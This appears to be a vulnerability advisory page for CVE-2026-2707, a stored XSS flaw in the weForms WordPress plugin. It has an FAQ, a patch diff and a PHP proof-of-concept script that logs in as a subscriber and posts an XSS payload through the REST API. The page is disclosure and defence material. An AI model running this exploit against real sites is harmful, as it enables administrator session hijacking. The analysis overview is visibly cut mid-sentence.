What is CVE-2026-2707?

CVE-2026-2707 is a stored cross-site scripting (XSS) vulnerability in the weForms plugin for WordPress, affecting versions up to 1.6.27. It allows authenticated users with Subscriber-level access and above to inject malicious scripts into form entries via the REST API.

How does the vulnerability work?

The vulnerability arises from inconsistent input sanitization between the frontend AJAX handler and the REST API endpoint. When form entries are submitted via the REST API, the input is not properly sanitized, allowing attackers to inject scripts that execute when an administrator views the entries.

Who is affected by this vulnerability?

Any WordPress site using the weForms plugin version 1.6.27 or earlier is affected. Specifically, authenticated users with Subscriber-level access or higher can exploit this vulnerability.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the weForms plugin installed. If it is version 1.6.27 or earlier, your site is at risk. Additionally, review your site’s logs for any unauthorized form submissions.

How can I fix this vulnerability?

To fix this vulnerability, update the weForms plugin to version 1.6.28 or later, where the issue has been patched. Regularly check for updates to ensure your plugins are secure.

What does a CVSS score of 6.4 mean?

A CVSS score of 6.4 indicates a medium severity vulnerability. This means there is a moderate risk of exploitation, which could lead to significant consequences, such as unauthorized access or data manipulation.

What practical risks does this vulnerability pose?

If exploited, this vulnerability can allow attackers to inject JavaScript that executes in the context of an administrator’s session. This could lead to session hijacking, administrative account compromise, or even a complete site takeover.

What changes were made in the patched version?

In version 1.6.28, the sanitization process was improved by ensuring that all input values are sanitized with appropriate functions instead of just being trimmed. Additionally, Vue.js directives were changed to prevent the execution of untrusted content.

How does the proof of concept demonstrate the vulnerability?

The proof of concept shows how an authenticated user can submit a form entry with a malicious payload that executes when an administrator views the entries. It illustrates the steps to authenticate and submit a payload, highlighting the vulnerability’s exploitability.

What should I do if I cannot update the plugin immediately?

If immediate updates are not possible, consider disabling the weForms plugin temporarily to prevent potential exploitation. Additionally, review user roles and limit access to the REST API for lower-privileged users.

Are there any other security measures I should take?

In addition to updating plugins, implement security best practices such as regular backups, using a web application firewall, and monitoring for suspicious activity on your WordPress site.

Where can I find more information about this vulnerability?

More information can be found in the official CVE database, security advisories from the plugin developer, and security blogs that analyze vulnerabilities in WordPress plugins.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2026-2707: weForms <= 1.6.27 – Authenticated (Subscriber+) Stored Cross-Site Scripting via Hidden Field Value via REST API (weforms)

CVE ID CVE-2026-2707

Plugin weforms

Severity Medium (CVSS 6.4)

CWE 79

Vulnerable Version 1.6.27

Patched Version 1.6.28

Disclosed March 9, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-2707:

The vulnerability exists in the weForms WordPress plugin versions get_params()`. All values are sanitized with `sanitize_textarea_field()` instead of just `trim()`. The template files replace most `v-html` directives with Vue.js interpolation `{{ }}` for automatic escaping. Specific field types that require HTML rendering (textarea, file uploads, signature fields, grid fields) now use explicit allowlists with `wp_kses_post()` or custom `wp_kses()` rules.

If exploited, this vulnerability allows authenticated attackers with minimal privileges to inject arbitrary JavaScript that executes in administrator sessions. This can lead to session hijacking, administrative account compromise, or complete site takeover through subsequent payloads.

Differential between vulnerable and patched code

Code Diff

--- a/weforms/assets/js-templates/spa-components.php
+++ b/weforms/assets/js-templates/spa-components.php
@@ -77,7 +77,7 @@
                         <th scope="row" class="check-column">
                             <input type="checkbox" name="post[]" v-model="checkedItems" :value="entry.id">
                         </th>
-                        <td v-for="(header, index) in columns"><span v-html="entry.fields[index]"></span></td>
+                        <td v-for="(header, index) in columns"><span>{{ entry.fields[index] }}</span></td>
                         <th class="col-entry-details">
                             <template v-if="status == 'trash'">
                                 <a href="#" @click.prevent="restore(entry.id)"><?php esc_html_e( 'Restore', 'weforms' ); ?></a>
@@ -96,7 +96,7 @@
                     <th scope="row" class="check-column">
                         <input type="checkbox" name="post[]" v-model="checkedItems" :value="entry.id">
                     </th>
-                    <td v-for="(header, index) in columns"><span v-html="entry.fields[index]"></span></td>
+                    <td v-for="(header, index) in columns"><span>{{ entry.fields[index] }}</span></td>
                     <th class="col-entry-details">
                         <template v-if="status == 'trash'">
                             <a href="#" @click.prevent="restore(entry.id)"><?php esc_html_e( 'Restore', 'weforms' ); ?></a>
@@ -425,7 +425,9 @@
                                             </div>
                                             <div v-else-if="field.type === 'country_list_field'">{{ getCountryName( field.value ) }}</div>
                                             <div v-else-if="field.type === 'address_field'" v-html="getAddressFieldValue( field.value)"></div>
-                                            <div v-else v-html="field.value"></div>
+                                            <div v-else-if="field.type === 'textarea_field'" v-html="field.value"></div>
+                                            <div v-else-if="field.type === 'image_upload' || field.type === 'file_upload' || field.type === 'signature_field' || field.type === 'checkbox_grid' || field.type === 'multiple_choice_grid' || field.type === 'multiple_product'" v-html="field.value"></div>
+                                            <div v-else>{{ field.value }}</div>
                                         </td>
                                     </tr>
                                 </template>
--- a/weforms/includes/api/class-weforms-forms-controller.php
+++ b/weforms/includes/api/class-weforms-forms-controller.php
@@ -255,7 +255,7 @@
             $entry_fields = [];

             foreach ( $form_fields as $key => $field ) {
-                if ( $field['wpuf_cond']['condition_status'] == 'yes' ) {
+                if ( ! empty( $field['wpuf_cond'] ) && $field['wpuf_cond']['condition_status'] == 'yes' ) {
                     $logic          = [];
                     $cond_fields    = $field['wpuf_cond']['cond_field'];
                     $cond_operators = $field['wpuf_cond']['cond_operator'];
--- a/weforms/includes/class-form-entry.php
+++ b/weforms/includes/class-form-entry.php
@@ -108,6 +108,22 @@
         $grid_css_added = false;
         $grid_css       = '<style>.wpufTable {display: table; width: 100%; } .wpufTableRow {display: table-row; } .wpufTableRow:nth-child(even) {background-color: #f5f5f5; } .wpufTableHeading {background-color: #eee; display: table-header-group; font-weight: bold; } .wpufTableCell, .wpufTableHead {border: none; display: table-cell; padding: 3px 10px; } .wpufTableFoot {background-color: #eee; display: table-footer-group; font-weight: bold; } .wpufTableBody {display: table-row-group; }</style>';

+        // Custom allowlist for grid field HTML: wp_kses_post() strips <style> and <input>,
+        // but all dynamic values are already escaped (esc_html/esc_attr) at construction time.
+        $grid_kses_allowed = array(
+            'style' => array(),
+            'div'   => array( 'class' => true ),
+            'label' => array( 'class' => true ),
+            'input' => array(
+                'name'     => true,
+                'class'    => true,
+                'type'     => true,
+                'value'    => true,
+                'checked'  => true,
+                'disabled' => true,
+            ),
+        );
+
         $values = [];

         $query = $wpdb->prepare(
@@ -142,7 +158,7 @@
                     $this->raw_fields[ $result->meta_key ]['value'] = $value;

                     if ( $field['type'] == 'textarea_field' ) {
-                        $value = weforms_format_text( $value );
+                        $value = wp_kses_post( weforms_format_text( $value ) );
                     } elseif ( $field['type'] == 'name_field' ) {
                         $value = implode( ' ', explode( WeForms::$field_separator, $value ) );
                     } elseif ( in_array( $field['type'], [ 'dropdown_field', 'radio_field' ] ) ) {
@@ -180,16 +196,16 @@
                                 if ( $field['type'] == 'image_upload' ) {
                                     $thumb = wp_get_attachment_image( $attachment_id, 'thumbnail' );
                                 } else {
-                                    $thumb = get_post_field( 'post_title', $attachment_id );
+                                    $thumb = esc_html( get_post_field( 'post_title', $attachment_id ) );
                                 }

-                                $full_size = wp_get_attachment_url( $attachment_id );
+                                $full_size = esc_url( wp_get_attachment_url( $attachment_id ) );

-                                $file_field .= sprintf( '<a href="%s" target="_blank">%s</a> ', $full_size, $thumb );
+                                $file_field .= sprintf( '<a href="%s" target="_blank" rel="noopener noreferrer">%s</a> ', $full_size, $thumb );
                             }
                         }

-                        $value = $file_field;
+                        $value = wp_kses_post( $file_field );
                     } elseif ( $field['type'] == 'google_map' ) {
                         list( $address, $lat, $long ) = explode( '||', $value );

@@ -221,7 +237,7 @@
                                 }
                             }

-                            $value = implode( '<br> <br> ', $serialized_value );
+                            $value = wp_kses_post( implode( '<br> <br> ', $serialized_value ) );
                         }
                     } elseif ( $field['type'] == 'checkbox_grid' ) {
                         // Security fix: Prevent PHP Object Injection by restricting allowed classes
@@ -251,7 +267,7 @@
                                             <div class="wpufTableHead"> </div>';

                                 foreach ( $field['grid_columns'] as $column ) {
-                                    $return .= '<div class="wpufTableHead">' . $column . '</div>';
+                                    $return .= '<div class="wpufTableHead">' . esc_html( $column ) . '</div>';
                                 }

                                 $return .= '</div>
@@ -260,7 +276,7 @@

                                 foreach ( $field['grid_rows'] as $row_key => $row_value ) {
                                     $return .= '<div class="wpufTableRow">
-                                                <div class="wpufTableHead">' . $row_value . '</div>';
+                                                <div class="wpufTableHead">' . esc_html( $row_value ) . '</div>';

                                     foreach ( $field['grid_columns'] as $column_key => $column_value ) {
                                         if ( isset( $new_val[ $row_key ] ) ) {
@@ -287,7 +303,7 @@
                                 </div>';
                             }

-                            $value = $return;
+                            $value = wp_kses( $return, $grid_kses_allowed );
                         }
                     } elseif ( $field['type'] == 'multiple_choice_grid' ) {
                         // Security fix: Prevent PHP Object Injection by restricting allowed classes
@@ -317,7 +333,7 @@
                                             <div class="wpufTableHead"> </div>';

                                 foreach ( $field['grid_columns'] as $column ) {
-                                    $return .= '<div class="wpufTableHead">' . $column . '</div>';
+                                    $return .= '<div class="wpufTableHead">' . esc_html( $column ) . '</div>';
                                 }

                                 $return .= '</div>
@@ -326,7 +342,7 @@

                                 foreach ( $field['grid_rows'] as $row_key => $row_value ) {
                                     $return .= '<div class="wpufTableRow">
-                                                <div class="wpufTableHead">' . $row_value . '</div>';
+                                                <div class="wpufTableHead">' . esc_html( $row_value ) . '</div>';

                                     foreach ( $field['grid_columns'] as $column_key => $column_value ) {
                                         if ( isset( $new_val[ $row_key ] ) ) {
@@ -353,7 +369,7 @@
                                 </div>';
                             }

-                            $value = $return;
+                            $value = wp_kses( $return, $grid_kses_allowed );
                         }
                     } elseif ( $field['type'] == 'address_field' || is_serialized( $value ) ) {
                         // Security fix: Prevent PHP Object Injection by restricting allowed classes
@@ -373,16 +389,15 @@
                             $value = implode( '<br> ', $serialized_value );
                         }
                     } elseif ( $field['type'] == 'signature_field' ) {
-                        $url   =  $value;
-
-                        if ( isset( $_REQUEST['action'] ) != 'weforms_pdf_download' ) {
-                            $url   = content_url() . '/' . $value;
+                        if ( ! isset( $_REQUEST['action'] ) || $_REQUEST['action'] !== 'weforms_pdf_download' ) {
+                            $url   = esc_url( content_url() . '/' . $value );
                             $value = sprintf( '<img src="%s">', $url );
                             $value .= sprintf( '<a style="margin-left: -200px" href="%s">Download</a>', $url );
-                        }
-                        else{
+                        } else {
+                            $url   = esc_url( $value );
                             $value = sprintf( '<img src="%s">', $url );
                         }
+                        $value = wp_kses_post( $value );
                     }

                     $this->fields[ $result->meta_key ]['value'] = apply_filters( 'weforms_entry_meta_field', $value, $field );
--- a/weforms/includes/class-form.php
+++ b/weforms/includes/class-form.php
@@ -433,7 +433,6 @@
     public function get_changed_fields( $form_fields ) {
         $changed_fields = array();
         foreach ( $form_fields as $field ) {
-            $org_field = $field['original_name'];
             // All form fields should have an original name.
             if ( empty( $field['original_name'] ) ) {
                 continue;
--- a/weforms/includes/class-notification.php
+++ b/weforms/includes/class-notification.php
@@ -602,6 +602,7 @@
      * @return string
      */
     public static function replace_file_tags( $text, $entry_id ) {
+        $text    = $text ?? '';
         $pattern = '/{(?:image|file):(w*)}/';

         preg_match_all( $pattern, $text, $matches );
@@ -614,17 +615,10 @@
         foreach ( $matches[1] as $index => $meta_key ) {
             $meta_value = weforms_get_entry_meta( $entry_id, $meta_key, true );

-            $files = [];
+            $files       = [];
+            $attachments = is_array( $meta_value ) ? $meta_value : array( $meta_value );

-            if ( is_array( $meta_value ) ) {
-                foreach ( $meta_value as $key => $attachment_id ) {
-                    $file_url = wp_get_attachment_url( $attachment_id );
-
-                    if ( $file_url ) {
-                        $files[] = $file_url;
-                    }
-                }
-            } else {
+            foreach ( $attachments as $attachment_id ) {
                 $file_url = wp_get_attachment_url( $attachment_id );

                 if ( $file_url ) {
--- a/weforms/includes/fields/class-abstract-fields.php
+++ b/weforms/includes/fields/class-abstract-fields.php
@@ -531,21 +531,32 @@
      * @return mixed
      */
     public function prepare_entry( $field, $args = [] ) {
-        if( empty( $_POST['_wpnonce'] ) ) {
-             wp_send_json_error( __( 'Unauthorized operation', 'weforms' ) );
+        if ( $args instanceof WP_REST_Request ) {
+            $nonce = $args->get_param( '_wpnonce' );
+        } else {
+            $nonce = isset( $_POST['_wpnonce'] ) ? $_POST['_wpnonce'] : '';
+        }
+
+        if ( empty( $nonce ) ) {
+            wp_send_json_error( __( 'Unauthorized operation', 'weforms' ) );
         }

-        if ( ! wp_verify_nonce( sanitize_text_field( wp_unslash( $_POST['_wpnonce'] ) ), 'wpuf_form_add' ) ) {
+        if ( ! wp_verify_nonce( sanitize_text_field( wp_unslash( $nonce ) ), 'wpuf_form_add' ) ) {
             wp_send_json_error( __( 'Unauthorized operation', 'weforms' ) );
         }

-        $args  = ! empty( $args ) ? $args : weforms_clean( $_POST );
-        $value = !empty( $args[$field['name']] ) ? $args[$field['name']] : '';
+        if ( $args instanceof WP_REST_Request ) {
+            $args = weforms_clean( $args->get_params() );
+        } elseif ( empty( $args ) ) {
+            $args = weforms_clean( $_POST );
+        }
+
+        $value = ! empty( $args[ $field['name'] ] ) ? $args[ $field['name'] ] : '';

         if ( is_array( $value ) ) {
-            $entry_value = implode( WeForms::$field_separator, $args[$field['name']] );
+            $entry_value = implode( WeForms::$field_separator, $value );
         } else {
-            $entry_value = trim( $value  );
+            $entry_value = sanitize_textarea_field( trim( $value ) );
         }

         return $entry_value;
--- a/weforms/includes/functions.php
+++ b/weforms/includes/functions.php
@@ -621,7 +621,7 @@
         }

         $data[ $field['name'] ] = [
-            'label' => $field['label'],
+            'label' => $field['label'] ?? '',
             'type'  => $field['template'],
         ];
     }
@@ -715,6 +715,7 @@
     $bname    = 'Unknown';
     $platform = 'Unknown';
     $version  = '';
+    $ub       = '';

     // first get the platform
     if ( preg_match( '/linux/i', $u_agent ) ) {
--- a/weforms/trunk/assets/js-templates/spa-components.php
+++ b/weforms/trunk/assets/js-templates/spa-components.php
@@ -77,7 +77,7 @@
                         <th scope="row" class="check-column">
                             <input type="checkbox" name="post[]" v-model="checkedItems" :value="entry.id">
                         </th>
-                        <td v-for="(header, index) in columns"><span v-html="entry.fields[index]"></span></td>
+                        <td v-for="(header, index) in columns"><span>{{ entry.fields[index] }}</span></td>
                         <th class="col-entry-details">
                             <template v-if="status == 'trash'">
                                 <a href="#" @click.prevent="restore(entry.id)"><?php esc_html_e( 'Restore', 'weforms' ); ?></a>
@@ -96,7 +96,7 @@
                     <th scope="row" class="check-column">
                         <input type="checkbox" name="post[]" v-model="checkedItems" :value="entry.id">
                     </th>
-                    <td v-for="(header, index) in columns"><span v-html="entry.fields[index]"></span></td>
+                    <td v-for="(header, index) in columns"><span>{{ entry.fields[index] }}</span></td>
                     <th class="col-entry-details">
                         <template v-if="status == 'trash'">
                             <a href="#" @click.prevent="restore(entry.id)"><?php esc_html_e( 'Restore', 'weforms' ); ?></a>
@@ -425,7 +425,9 @@
                                             </div>
                                             <div v-else-if="field.type === 'country_list_field'">{{ getCountryName( field.value ) }}</div>
                                             <div v-else-if="field.type === 'address_field'" v-html="getAddressFieldValue( field.value)"></div>
-                                            <div v-else v-html="field.value"></div>
+                                            <div v-else-if="field.type === 'textarea_field'" v-html="field.value"></div>
+                                            <div v-else-if="field.type === 'image_upload' || field.type === 'file_upload' || field.type === 'signature_field' || field.type === 'checkbox_grid' || field.type === 'multiple_choice_grid' || field.type === 'multiple_product'" v-html="field.value"></div>
+                                            <div v-else>{{ field.value }}</div>
                                         </td>
                                     </tr>
                                 </template>
--- a/weforms/trunk/includes/api/class-weforms-forms-controller.php
+++ b/weforms/trunk/includes/api/class-weforms-forms-controller.php
@@ -255,7 +255,7 @@
             $entry_fields = [];

             foreach ( $form_fields as $key => $field ) {
-                if ( $field['wpuf_cond']['condition_status'] == 'yes' ) {
+                if ( ! empty( $field['wpuf_cond'] ) && $field['wpuf_cond']['condition_status'] == 'yes' ) {
                     $logic          = [];
                     $cond_fields    = $field['wpuf_cond']['cond_field'];
                     $cond_operators = $field['wpuf_cond']['cond_operator'];
--- a/weforms/trunk/includes/class-form-entry.php
+++ b/weforms/trunk/includes/class-form-entry.php
@@ -108,6 +108,22 @@
         $grid_css_added = false;
         $grid_css       = '<style>.wpufTable {display: table; width: 100%; } .wpufTableRow {display: table-row; } .wpufTableRow:nth-child(even) {background-color: #f5f5f5; } .wpufTableHeading {background-color: #eee; display: table-header-group; font-weight: bold; } .wpufTableCell, .wpufTableHead {border: none; display: table-cell; padding: 3px 10px; } .wpufTableFoot {background-color: #eee; display: table-footer-group; font-weight: bold; } .wpufTableBody {display: table-row-group; }</style>';

+        // Custom allowlist for grid field HTML: wp_kses_post() strips <style> and <input>,
+        // but all dynamic values are already escaped (esc_html/esc_attr) at construction time.
+        $grid_kses_allowed = array(
+            'style' => array(),
+            'div'   => array( 'class' => true ),
+            'label' => array( 'class' => true ),
+            'input' => array(
+                'name'     => true,
+                'class'    => true,
+                'type'     => true,
+                'value'    => true,
+                'checked'  => true,
+                'disabled' => true,
+            ),
+        );
+
         $values = [];

         $query = $wpdb->prepare(
@@ -142,7 +158,7 @@
                     $this->raw_fields[ $result->meta_key ]['value'] = $value;

                     if ( $field['type'] == 'textarea_field' ) {
-                        $value = weforms_format_text( $value );
+                        $value = wp_kses_post( weforms_format_text( $value ) );
                     } elseif ( $field['type'] == 'name_field' ) {
                         $value = implode( ' ', explode( WeForms::$field_separator, $value ) );
                     } elseif ( in_array( $field['type'], [ 'dropdown_field', 'radio_field' ] ) ) {
@@ -180,16 +196,16 @@
                                 if ( $field['type'] == 'image_upload' ) {
                                     $thumb = wp_get_attachment_image( $attachment_id, 'thumbnail' );
                                 } else {
-                                    $thumb = get_post_field( 'post_title', $attachment_id );
+                                    $thumb = esc_html( get_post_field( 'post_title', $attachment_id ) );
                                 }

-                                $full_size = wp_get_attachment_url( $attachment_id );
+                                $full_size = esc_url( wp_get_attachment_url( $attachment_id ) );

-                                $file_field .= sprintf( '<a href="%s" target="_blank">%s</a> ', $full_size, $thumb );
+                                $file_field .= sprintf( '<a href="%s" target="_blank" rel="noopener noreferrer">%s</a> ', $full_size, $thumb );
                             }
                         }

-                        $value = $file_field;
+                        $value = wp_kses_post( $file_field );
                     } elseif ( $field['type'] == 'google_map' ) {
                         list( $address, $lat, $long ) = explode( '||', $value );

@@ -221,7 +237,7 @@
                                 }
                             }

-                            $value = implode( '<br> <br> ', $serialized_value );
+                            $value = wp_kses_post( implode( '<br> <br> ', $serialized_value ) );
                         }
                     } elseif ( $field['type'] == 'checkbox_grid' ) {
                         // Security fix: Prevent PHP Object Injection by restricting allowed classes
@@ -251,7 +267,7 @@
                                             <div class="wpufTableHead"> </div>';

                                 foreach ( $field['grid_columns'] as $column ) {
-                                    $return .= '<div class="wpufTableHead">' . $column . '</div>';
+                                    $return .= '<div class="wpufTableHead">' . esc_html( $column ) . '</div>';
                                 }

                                 $return .= '</div>
@@ -260,7 +276,7 @@

                                 foreach ( $field['grid_rows'] as $row_key => $row_value ) {
                                     $return .= '<div class="wpufTableRow">
-                                                <div class="wpufTableHead">' . $row_value . '</div>';
+                                                <div class="wpufTableHead">' . esc_html( $row_value ) . '</div>';

                                     foreach ( $field['grid_columns'] as $column_key => $column_value ) {
                                         if ( isset( $new_val[ $row_key ] ) ) {
@@ -287,7 +303,7 @@
                                 </div>';
                             }

-                            $value = $return;
+                            $value = wp_kses( $return, $grid_kses_allowed );
                         }
                     } elseif ( $field['type'] == 'multiple_choice_grid' ) {
                         // Security fix: Prevent PHP Object Injection by restricting allowed classes
@@ -317,7 +333,7 @@
                                             <div class="wpufTableHead"> </div>';

                                 foreach ( $field['grid_columns'] as $column ) {
-                                    $return .= '<div class="wpufTableHead">' . $column . '</div>';
+                                    $return .= '<div class="wpufTableHead">' . esc_html( $column ) . '</div>';
                                 }

                                 $return .= '</div>
@@ -326,7 +342,7 @@

                                 foreach ( $field['grid_rows'] as $row_key => $row_value ) {
                                     $return .= '<div class="wpufTableRow">
-                                                <div class="wpufTableHead">' . $row_value . '</div>';
+                                                <div class="wpufTableHead">' . esc_html( $row_value ) . '</div>';

                                     foreach ( $field['grid_columns'] as $column_key => $column_value ) {
                                         if ( isset( $new_val[ $row_key ] ) ) {
@@ -353,7 +369,7 @@
                                 </div>';
                             }

-                            $value = $return;
+                            $value = wp_kses( $return, $grid_kses_allowed );
                         }
                     } elseif ( $field['type'] == 'address_field' || is_serialized( $value ) ) {
                         // Security fix: Prevent PHP Object Injection by restricting allowed classes
@@ -373,16 +389,15 @@
                             $value = implode( '<br> ', $serialized_value );
                         }
                     } elseif ( $field['type'] == 'signature_field' ) {
-                        $url   =  $value;
-
-                        if ( isset( $_REQUEST['action'] ) != 'weforms_pdf_download' ) {
-                            $url   = content_url() . '/' . $value;
+                        if ( ! isset( $_REQUEST['action'] ) || $_REQUEST['action'] !== 'weforms_pdf_download' ) {
+                            $url   = esc_url( content_url() . '/' . $value );
                             $value = sprintf( '<img src="%s">', $url );
                             $value .= sprintf( '<a style="margin-left: -200px" href="%s">Download</a>', $url );
-                        }
-                        else{
+                        } else {
+                            $url   = esc_url( $value );
                             $value = sprintf( '<img src="%s">', $url );
                         }
+                        $value = wp_kses_post( $value );
                     }

                     $this->fields[ $result->meta_key ]['value'] = apply_filters( 'weforms_entry_meta_field', $value, $field );
--- a/weforms/trunk/includes/class-form.php
+++ b/weforms/trunk/includes/class-form.php
@@ -433,7 +433,6 @@
     public function get_changed_fields( $form_fields ) {
         $changed_fields = array();
         foreach ( $form_fields as $field ) {
-            $org_field = $field['original_name'];
             // All form fields should have an original name.
             if ( empty( $field['original_name'] ) ) {
                 continue;
--- a/weforms/trunk/includes/class-notification.php
+++ b/weforms/trunk/includes/class-notification.php
@@ -602,6 +602,7 @@
      * @return string
      */
     public static function replace_file_tags( $text, $entry_id ) {
+        $text    = $text ?? '';
         $pattern = '/{(?:image|file):(w*)}/';

         preg_match_all( $pattern, $text, $matches );
@@ -614,17 +615,10 @@
         foreach ( $matches[1] as $index => $meta_key ) {
             $meta_value = weforms_get_entry_meta( $entry_id, $meta_key, true );

-            $files = [];
+            $files       = [];
+            $attachments = is_array( $meta_value ) ? $meta_value : array( $meta_value );

-            if ( is_array( $meta_value ) ) {
-                foreach ( $meta_value as $key => $attachment_id ) {
-                    $file_url = wp_get_attachment_url( $attachment_id );
-
-                    if ( $file_url ) {
-                        $files[] = $file_url;
-                    }
-                }
-            } else {
+            foreach ( $attachments as $attachment_id ) {
                 $file_url = wp_get_attachment_url( $attachment_id );

                 if ( $file_url ) {
--- a/weforms/trunk/includes/fields/class-abstract-fields.php
+++ b/weforms/trunk/includes/fields/class-abstract-fields.php
@@ -531,21 +531,32 @@
      * @return mixed
      */
     public function prepare_entry( $field, $args = [] ) {
-        if( empty( $_POST['_wpnonce'] ) ) {
-             wp_send_json_error( __( 'Unauthorized operation', 'weforms' ) );
+        if ( $args instanceof WP_REST_Request ) {
+            $nonce = $args->get_param( '_wpnonce' );
+        } else {
+            $nonce = isset( $_POST['_wpnonce'] ) ? $_POST['_wpnonce'] : '';
+        }
+
+        if ( empty( $nonce ) ) {
+            wp_send_json_error( __( 'Unauthorized operation', 'weforms' ) );
         }

-        if ( ! wp_verify_nonce( sanitize_text_field( wp_unslash( $_POST['_wpnonce'] ) ), 'wpuf_form_add' ) ) {
+        if ( ! wp_verify_nonce( sanitize_text_field( wp_unslash( $nonce ) ), 'wpuf_form_add' ) ) {
             wp_send_json_error( __( 'Unauthorized operation', 'weforms' ) );
         }

-        $args  = ! empty( $args ) ? $args : weforms_clean( $_POST );
-        $value = !empty( $args[$field['name']] ) ? $args[$field['name']] : '';
+        if ( $args instanceof WP_REST_Request ) {
+            $args = weforms_clean( $args->get_params() );
+        } elseif ( empty( $args ) ) {
+            $args = weforms_clean( $_POST );
+        }
+
+        $value = ! empty( $args[ $field['name'] ] ) ? $args[ $field['name'] ] : '';

         if ( is_array( $value ) ) {
-            $entry_value = implode( WeForms::$field_separator, $args[$field['name']] );
+            $entry_value = implode( WeForms::$field_separator, $value );
         } else {
-            $entry_value = trim( $value  );
+            $entry_value = sanitize_textarea_field( trim( $value ) );
         }

         return $entry_value;
--- a/weforms/trunk/includes/functions.php
+++ b/weforms/trunk/includes/functions.php
@@ -621,7 +621,7 @@
         }

         $data[ $field['name'] ] = [
-            'label' => $field['label'],
+            'label' => $field['label'] ?? '',
             'type'  => $field['template'],
         ];
     }
@@ -715,6 +715,7 @@
     $bname    = 'Unknown';
     $platform = 'Unknown';
     $version  = '';
+    $ub       = '';

     // first get the platform
     if ( preg_match( '/linux/i', $u_agent ) ) {
--- a/weforms/trunk/weforms.php
+++ b/weforms/trunk/weforms.php
@@ -5,7 +5,7 @@
  * Plugin URI: https://weformspro.com/
  * Author: weForms
  * Author URI: https://weformspro.com/
- * Version: 1.6.27
+ * Version: 1.6.28
  * License: GPL2 or later
  * License URI: https://www.gnu.org/licenses/gpl-2.0.html
  * Text Domain: weforms
@@ -55,7 +55,7 @@
      *
      * @var string
      */
-    public $version = '1.6.27';
+    public $version = '1.6.28';

     /**
      * Form field value seperator
--- a/weforms/weforms.php
+++ b/weforms/weforms.php
@@ -5,7 +5,7 @@
  * Plugin URI: https://weformspro.com/
  * Author: weForms
  * Author URI: https://weformspro.com/
- * Version: 1.6.27
+ * Version: 1.6.28
  * License: GPL2 or later
  * License URI: https://www.gnu.org/licenses/gpl-2.0.html
  * Text Domain: weforms
@@ -55,7 +55,7 @@
      *
      * @var string
      */
-    public $version = '1.6.27';
+    public $version = '1.6.28';

     /**
      * Form field value seperator

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-2707 - weForms <= 1.6.27 - Authenticated (Subscriber+) Stored Cross-Site Scripting via Hidden Field Value via REST API

<?php
/**
 * Proof of Concept for CVE-2026-2707
 * Requires: WordPress installation with weForms plugin <= 1.6.27
 *           Valid subscriber-level user credentials
 *           Form ID with at least one hidden field
 */

$target_url = 'https://example.com'; // Change to target WordPress site
$username = 'subscriber'; // Subscriber-level username
$password = 'password'; // Subscriber password
$form_id = 1; // Target form ID (visible in weForms form shortcode)

// Payload to inject - executes alert when admin views entries
$payload = '<img src=x onerror=alert(document.domain)>';

// Step 1: Authenticate and get WordPress nonce
$login_url = $target_url . '/wp-login.php';
$admin_url = $target_url . '/wp-admin/';

// Create cURL session for authentication
$ch = curl_init();
curl_setopt_array($ch, [
    CURLOPT_URL => $login_url,
    CURLOPT_RETURNTRANSFER => true,
    CURLOPT_FOLLOWLOCATION => true,
    CURLOPT_COOKIEJAR => 'cookies.txt',
    CURLOPT_COOKIEFILE => 'cookies.txt',
    CURLOPT_SSL_VERIFYPEER => false,
    CURLOPT_SSL_VERIFYHOST => false
]);

// Get login page to extract nonce
$response = curl_exec($ch);
preg_match('/name="log"[^>]*>/', $response, $matches);

// Submit login credentials
$post_fields = [
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $admin_url,
    'testcookie' => '1'
];

curl_setopt_array($ch, [
    CURLOPT_URL => $login_url,
    CURLOPT_POST => true,
    CURLOPT_POSTFIELDS => http_build_query($post_fields),
    CURLOPT_HTTPHEADER => ['Content-Type: application/x-www-form-urlencoded']
]);

$response = curl_exec($ch);

// Step 2: Get REST API nonce from admin page
curl_setopt_array($ch, [
    CURLOPT_URL => $admin_url,
    CURLOPT_POST => false
]);

$response = curl_exec($ch);
preg_match('/"api_nonce":"([a-f0-9]+)"/', $response, $matches);
$api_nonce = $matches[1] ?? '';

if (empty($api_nonce)) {
    die('Failed to get API nonce. Check authentication.');
}

// Step 3: Submit malicious entry via REST API
$rest_url = $target_url . '/wp-json/weforms/v1/forms/' . $form_id . '/entries/';

// Create form submission data with XSS payload in hidden field
// Assumes form has a hidden field named 'hidden_field'
$entry_data = [
    'hidden_field' => $payload, // XSS payload in hidden field value
    '_wpnonce' => $api_nonce
];

curl_setopt_array($ch, [
    CURLOPT_URL => $rest_url,
    CURLOPT_POST => true,
    CURLOPT_POSTFIELDS => json_encode($entry_data),
    CURLOPT_HTTPHEADER => [
        'Content-Type: application/json',
        'X-WP-Nonce: ' . $api_nonce
    ]
]);

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);

echo "HTTP Response Code: $http_coden";
echo "Response: $responsen";

if ($http_code === 200 || $http_code === 201) {
    echo "[+] XSS payload successfully submitted via REST API.n";
    echo "[+] Payload will execute when administrator views form entries.n";
} else {
    echo "[-] Submission failed. Check form ID and field names.n";
}

curl_close($ch);
unlink('cookies.txt');

?>

Frequently Asked Questions

What is CVE-2026-2707?
Overview of the vulnerability
